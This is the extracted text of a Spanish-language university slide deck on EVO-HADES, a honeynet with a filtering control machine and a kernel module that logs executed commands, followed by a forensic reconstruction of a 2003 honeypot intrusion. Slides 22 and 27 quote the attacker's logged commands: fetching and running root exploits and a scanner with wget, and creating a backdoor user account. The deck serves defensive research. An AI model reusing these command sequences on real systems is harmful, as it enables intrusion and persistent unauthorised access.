EVO-HADES: Arquitectura para la monitorizaci

1
EVO-HADES Arquitectura para la monitorización y
análisis forense

• Jesús Damián Jiménez Re
• ltjdjimenez_at_dif.um.esgt
• Universidad de Murcia

2
Contenido

1. Objetivos
2. Infraestructura de red
3. Monitorización de procesos
4. Análisis de una Intrusión
5. Conclusiones

3
Contenido

1. Objetivos
2. Infraestructura de red
3. Monitorización de procesos
4. Análisis de una Intrusión
5. Conclusiones

4
1. Objetivos

• Ámbito de actuación
• Evolución del sistema HADES
• Proyecto fin de carrera desarrollado en la
  Universidad de Murcia
• En colaboración con el proyecto de máquinas
  trampa de RedIRIS

5
1. Objetivos

• Objetivo
• Diseño de una arquitectura de red que permita

6
Contenido

1. Objetivos
2. Infraestructura de red
3. Monitorización de procesos
4. Análisis de una Intrusión
5. Conclusiones

7
2. Infraestructura de red

• Basada en los
• sistemas HoneyNET
• Separación entre
• Subred de control
• Subred trampa
• Subred corporativa
• Máquina de control
• Conectada físicamente a la subred trampa, pero
  sin interfaz de red en ella
• Modo puente
• Activado filtrado paquetes (firewall)

8
2. Infraestructura de red

• Máquina de control
• Paquete RPM para la instalación del modo puente
  firewall
• Configuración del filtrado/captura de equipos
  trampa mediante ficheros de configuración

Ejemplo de fichero de configuración de
PED-CONTROL Maquinas cuyo tráfico se desea
capturar 155.54.XX.YY captura Maquinas cuyo
tráfico se desea filtrar 155.54.ZZ.TT filtra

• Inicio y parada del puentefirewall con comandos
  start/stop.
• Comprobación periódica del tamaño de los ficheros
  de captura ? Envío de e-mail de alerta
• Filtrado de tráfico para evitar ataques al
  exterior

9
2. Infraestructura de red

• Máquinas trampa
• Se han habilitado los servicios habituales en una
  organización
• FTP
• telnet
• SSH
• Servidor Web
• Proxy

10
Contenido

1. Objetivos
2. Infraestructura de red
3. Monitorización de procesos
4. Análisis de una Intrusión
5. Conclusiones

11
3. Monitorización de procesos

• Existen ocasiones en las que están implicadas
  conexiones encriptadas entre el equipo trampa y
  el atacante
• Ejemplo El atacante instala una versión
  modificada del servidor OpenSSH (sshd).

• No es posible la visualización mediante el
  análisis del tráfico de la red

12
3. Monitorización de procesos

• Solución Modificaciones a nivel del sistema
  operativo para el envío remoto de
• Procesos/comandos ejecutados
• Implantación de un módulo a nivel del kernel de
  Linux que envía información a la máquina de
  control

13
3. Monitorización de procesos

• Módulo para la monitorización
• Técnica
• Se interceptan las llamadas al sistema provocadas
  por los procesos
• Se ejecuta el código original, más
• El nuevo código, que en nuestro caso envía una
  trama UDP con el proceso ejecutado
• El tráfico generado por el módulo será capturado
  por la máquina de control, junto al resto del
  tráfico de la máquina

14
Contenido

1. Objetivos
2. Infraestructura de red
3. Monitorización de procesos
4. Análisis de una Intrusión
5. Conclusiones

15
4. Análisis de una intrusión

• Objetivos del análisis
• Detectar nuevos patrones de ataque y las
  herramientas utilizadas para ello
• Obtener pruebas que justifiquen posibles acciones
  legales sobre el atacante
• Estudio de nuevas herramientas
• The Sleuth Kit y Autopsy Forensic Browser

16
4. Análisis de una intrusión

• Metodología
• Se utiliza la suma de 3 técnicas

• Toda esta información (imágenes capturas) es
  pasada a la máquina de análisis para su estudio

17
4. Análisis de una intrusión

• Descripción de la máquina atacada
• Nombre (ficticio) ped.um.es
• Linux Red Hat 7.2
• Puesta en red 29 de Mayo de 2003.
• Se descubre que ha sido atacada el día 31 de Mayo
  del 2003.
• Se permite el acceso monitorizado a la máquina
  durante 11 días (hasta el día 10 de Junio de
  2003).

18
4. Análisis de una intrusión

• Se detecta un aumento del tráfico HTTPS
• Se recibe un correo electrónico de alerta

From ZZ_at_control.um.es To TT_at_um.es Subject
aumento de 543 K en el trafico de
155.54.XX.YY --------- A las 201500 el equipo
de control control.um.es ha detectado un aumento
de 543 K en el tráfico con origen o destino la
máquina PED 155.54.XX.YY
19
4. Análisis de una intrusión

• Análisis de tráfico
• Se ha aprovechado una vulnerabilidad en la llave
  del protocolo OpenSSL y el servidor Apache.
• Esto permite iniciar un shell con permisos de
  Apache.
• En las conexiones posteriores al tráfico HTTPS,
  se descubre la descarga de diversos ficheros
  binarios
• Análisis forense
• Se analizan los ficheros descargados
• Exploit pt Abre un shell con privilegios de
  root. Se aprovecha de una vulnerabilidad de los
  kernel 2.4.X en la llamada al sistema ptrace
  (buffer overflow).

20
4. Análisis de una intrusión

• Análisis del tráfico
• Instalación del rootkit SuckIT en el directorio
  /usr/lib/
• Sat May 31 2003 200801
• 4096 .a. d/drwxr-xr-x root/user root
  145543 /usr/lib/
• 65928 ..c -/-rw-rr-- root/user root
  145544 /usr/lib//sk.tgz
• SuckIT basa su funcionamiento en módulo del
  núcleo
• Oculta PIDs, ficheros, conexiones tcp/udp/socket
  raw.
• Integra un shell TTY para el acceso remoto.

21
4. Análisis de una intrusión

• No se registra actividad en la máquina hasta el
  día 3 de Junio
• Análisis de tráfico
• Se sube mediante el servidor web el fichero
  /tmp/httpd y se ejecuta
• Tue Jun 03 2003 211644
• 21182 ..c -/-rwxr-xr-x apache apache
  62724 /tmp/httpd
• 21182 .a. -/-rwxr-xr-x apache apache
  62724 /tmp/httpd
• .

22
4. Análisis de una intrusión

• Análisis forense
• /tmp/httpd crea un terminal para la ejecución de
  comandos, con UID de Apache (48).
• Análisis de procesos (módulo)
• Para hacerse con permisos de root, el atacante
  vuelve a descargar el exploit utilizado para el
  primer ataque (con otro nombre diferente)
• 211750-2003/06/03
  48sh26217ttyp cd /tmp
• 211837-2003/06/03
  48sh26217ttyp wget direccIPoculta/ozn/abc/pr
  t
• 211925-2003/06/03
  48sh26217ttyp chmod x prt
• 211927-2003/06/03
  48sh26217ttyp ./prt
• Para asegurarse una entrada posterior al sistema
• 211934-2003/06/03
  0sh26223ttyp /usr/sbin/useradd pwd
• 212009-2003/06/03
  0sh26223ttyp passwd d pwd

23
4. Análisis de una intrusión

• El atacante instala utilidades para aprovechar la
  máquina atacada
• Análisis forense
• Se instala un proxy IRC llamado psyBNC
• Permite ocultar la IP real a los usuarios del
  proxy.
• Mantiene la conexión a IRC aunque se desconecte
  el cliente

24
4. Análisis de una intrusión

• El atacante quiere evitar que otros atacantes
  aprovechen la vulnerabilidad que él ha
  aprovechado para entrar al sistema
• Análisis forense
• Se instala el paquete sslstop.tgz, que contiene
  dos script
• sslstop Detiene el soporte SSL para Apache
• sslport Cambia el puerto SSL por defecto de la
  máquina

25
4. Análisis de una intrusión

• Desde el día 3 de Junio hasta el día 6 de Junio
• Conexiones de IRC
• Las conversaciones han quedado registradas en el
  tráfico capturado de la máquina atacada
• Se han reconstruido algunas con ethereal.

26
4. Análisis de una intrusión

• Tras mantener la máquina comprometida con éxito 7
  días, el atacante considera la máquina fiable
• Instalación de herramientas para utilizar esta
  máquina como puente para el ataque a otras
• Se instala el exploit con el que se atacó a esta
  máquina (openssl-too-open).
• Scanner de puertos

27
4. Análisis de una intrusión

• Análisis de la información del módulo
• Descarga del exploit openssl-too-open (http.tgz).
  
• 035231-2003/06/06
  0bash4064pts cd /etc
• 035233-2003/06/06
  0bash4064pts mkdir .
• 035234-2003/06/06
  0bash4064pts cd .
• 035251-2003/06/06
  0bash4064pts wget dirIPoculta/valisie/http.t
  gz
• Descarga y ejecución del scanner mass
• 115808-2003/06/06
  0bash4713pts wget dirIPoculta/valisie/mass.t
  gz
• 115817-2003/06/06
  0bash4713pts tar xvzf mass.tgz
• 115820-2003/06/06
  0bash4713pts cd mass
• 115822-2003/06/06
  0bash4713pts ./mass b 67.0.. -s 800
  
• Los filtros aplicados en la máquina de control
  hacen que estos escaneos no tengan éxito.

28
4. Análisis de una intrusión

• El día 10 de Junio se decide que ya se ha
  obtenido suficiente información del atacante.
• Se aplican el filtrado total a través de la
  máquina de control.
• Se apaga la máquina y se desconecta de la red.

29
Contenido

1. Objetivos
2. Infraestructura de red
3. Monitorización de procesos
4. Análisis de una Intrusión
5. Conclusiones

30
5. Conclusiones

• Se permite la detección de nuevos tipos y
  herramientas de ataque sin poner en riesgo los
  equipos actuales de la organización
• Con la monitorización de procesos remota
• Es fácil ver lo que está sucediendo en la máquina
  atacada sin tener que cortar la conexión
• Se obtiene información que no sería posible con
  las otras técnicas
• Complementa al análisis forense y análisis del
  tráfico
• Vías futuras
• Migración de la arquitectura para dar soporte a
  IPv6
• Portar el módulo a otros sistemas operativos
• Desarrollo de un sistema de aviso de ataques